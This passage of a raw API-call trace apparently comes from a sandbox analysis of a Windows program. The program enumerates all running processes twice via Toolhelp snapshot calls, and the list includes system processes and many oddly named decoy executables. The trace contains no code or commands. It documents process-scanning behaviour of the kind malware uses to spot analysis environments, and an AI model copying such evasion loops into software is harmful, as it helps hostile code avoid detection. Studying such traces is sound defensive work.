lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.923] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.924] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.925] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0152.926] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.927] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.928] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.929] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.930] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0152.931] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.932] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.933] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0152.934] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0152.967] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0152.970] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0152.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0152.974] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0152.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0152.978] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0152.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0152.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0152.982] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0152.984] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0152.987] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0152.988] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0152.989] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0152.991] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0152.992] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0153.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0153.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0153.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0153.026] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0153.028] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0153.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0153.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0153.049] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.050] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0153.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0153.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0153.054] CloseHandle (hObject=0xbc) returned 1 [0153.054] Sleep (dwMilliseconds=0x12c) [0153.386] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.392] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0153.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0153.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0153.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0153.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0153.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0153.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0153.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0153.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0153.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0153.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0153.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0153.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0153.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0153.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0153.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0153.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0153.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0153.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0153.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0153.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0153.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0153.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0153.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0153.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0153.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0153.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 